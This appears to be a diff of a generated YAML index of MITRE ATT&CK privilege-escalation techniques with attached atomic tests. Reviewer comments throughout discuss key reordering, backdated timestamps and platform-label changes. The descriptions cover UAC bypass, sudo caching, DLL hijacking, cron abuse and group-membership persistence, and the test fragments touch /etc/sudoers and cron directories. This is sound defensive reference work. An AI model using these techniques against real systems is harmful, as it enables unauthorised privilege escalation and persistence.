+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -17982,14 +18249,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -18090,7 +18356,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -18121,7 +18386,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -18155,8 +18420,6 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -18204,7 +18467,7 @@ privilege-escalation:
sudo visudo -c -f /etc/sudoers
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -18223,7 +18486,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -18237,7 +18499,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -18264,8 +18525,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -18296,12 +18557,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
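Review bot: For T1574.011 the `x_mitre_attack_spec_version` ends up at `3.2.0` and `x_mitre_modified_by_ref` is re-added at the end of the object, while the two earlier hunks for the same technique delete the `2.1.0` value and the original `x_mitre_modified_by_ref` line from their previous positions and `x_mitre_version` stays at `'1.1'`; the net content change is only the spec-version bump, so this is the clearest example in the patch of key reordering producing three hunks for a one-line change, and a fixed key order in the generator would collapse it.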
@@ -18373,9 +18635,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -18391,12 +18653,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
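Review bot: the `modified` timestamp for T1547.014 moves backwards here, from `2023-05-09T14:00:00.188Z` to `2023-03-22T14:17:17.353Z`, and the same backward move appears later for T1055.003 (2022-04-25 to 2021-10-18), T1546.011 (2022-04-25 to 2020-11-10), T1037.002 (2022-05-11 to 2022-04-20), T1055 (2023-05-09 to 2023-03-30), T1547.005 (2021-04-29 to 2020-03-25) and T1543.004 (2023-05-09 to 2023-03-30). A `modified` value that goes back in time usually means the generator is now reading a different upstream dataset rather than a newer ATT&CK release; confirm that the intended source is being pulled, otherwise these fields will flip on every regeneration and anyone diffing on `modified` to detect technique updates will get false positives.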
@@ -18471,12 +18732,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -18496,9 +18756,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
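Review bot: the extended T1484.002 description introduces `(Citation: AWS RE:Inforce Threat Detection 2024)`; that key must match a `source_name` in the object's `external_references` exactly, and the hunk further down does add an entry with that `source_name`, so the citation resolves. Note that the pre-existing key `AADInternals zure AD Federated Domain` in the unchanged context is a typo inherited from upstream and must not be hand-corrected in this generated file: the description key and the upstream `source_name` have to stay byte-identical or the citation stops resolving.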
@@ -18518,9 +18783,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
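Review bot: `x_mitre_platforms` for T1484.002 drops `Azure AD` and `SaaS` in favour of the new `Identity Provider` label (version 2.0 to 2.1). Anything in this repository that derives per-platform index files or filters from `x_mitre_platforms` by literal string will no longer place T1484.002 under the old names, so please confirm the index generator recognises `Identity Provider` (and whatever other new platform labels this import carries); otherwise the technique silently disappears from the platform-specific indexes without any error.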
@@ -18537,6 +18801,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -18570,7 +18838,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -18726,31 +18993,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
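Review bot: most of this hunk is key-order noise, not change. For T1053.003 the `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` blocks are deleted from the head of the object only to reappear unchanged after `x_mitre_permissions_required` in the following hunks. The real changes (the `modified` bump, version 1.1 to 1.2, the new `x_mitre_deprecated`/`x_mitre_remote_support` flags, the attack spec version moving from 2.1.0 to 3.2.0) are hard to see underneath it. Serialising each technique with a fixed key order (or sorted keys) in the generator would keep future diffs limited to actual content changes.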
@@ -18767,6 +19014,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -18777,9 +19025,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -18787,8 +19039,24 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -18853,7 +19121,7 @@ privilege-escalation:
rm /etc/cron.weekly/#{cron_script_name} -f
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -18883,6 +19151,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -18893,6 +19162,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -18901,13 +19171,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
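Review bot: for T1098.003 the platforms `Office 365`, `Google Workspace` and `Azure AD` are consolidated into `Office Suite` and `Identity Provider` (version 2.4 to 2.5), and `x_mitre_modified_by_ref` is moved up into the object body. Any index, filter or documentation keyed on the literal strings `Office 365` or `Google Workspace` now yields an empty result for this technique; if those per-platform views are meant to survive, the generator needs an explicit mapping from the retired labels to the new ones rather than a straight string match.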
@@ -18949,9 +19219,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -19019,19 +19286,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -19047,8 +19313,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -19062,7 +19328,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -19088,6 +19354,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -19115,12 +19385,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -19146,7 +19415,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -19188,7 +19457,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
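Review bot: after the `spec_version` removal, the T1574.014 entry ends with `atomic_tests: []` but has no `identifier:` line, unlike T1574.001 directly above (`identifier: T1574.001`) and T1574.011, T1547 and T1547.014 earlier in the file; T1098.006 in the next hunk has the same gap. If any consumer keys on `identifier` instead of the map key (`T1574.014:`), these entries are skipped. Either emit `identifier` for every technique or drop it everywhere; mixed presence in a generated file is a bug waiting to surface.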
@@ -19266,11 +19534,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -19350,7 +19617,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
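Review bot: the new T1098.007 (`Additional Local or Domain Groups`) entry ships with `atomic_tests: []`, yet the behaviour it describes (`net localgroup` / `net group` on Windows, `usermod` on Linux, adding accounts to local administrators, Remote Desktop Users or sudoers) is exactly the kind of account manipulation that existing T1098 atomics tend to exercise. Before merging, check whether any current T1098 tests should be re-homed under T1098.007 so the new sub-technique is not indexed as uncovered. Like T1574.014 and T1098.006 above, this entry also lacks an `identifier:` line, and it carries `x_mitre_detection: ''` and a macOS platform that the upstream description never mentions; the latter two are upstream content and should not be hand-edited here.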
@@ -19373,7 +19710,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19421,8 +19758,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
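Review bot: T1055.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here and, unlike T1574.011, T1547 and the other objects in this patch, gets no `x_mitre_attack_spec_version: 3.2.0` in return; T1546.011 and T1547.005 below are handled the same way. After this change those objects carry no attack spec version at all. That is consistent with upstream objects that predate the field, but it means nothing downstream may assume `x_mitre_attack_spec_version` is present; worth a line in the PR description, and worth a null check in anything that reads it.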
@@ -19454,7 +19789,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -19509,13 +19844,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -19576,9 +19909,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -19587,7 +19920,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
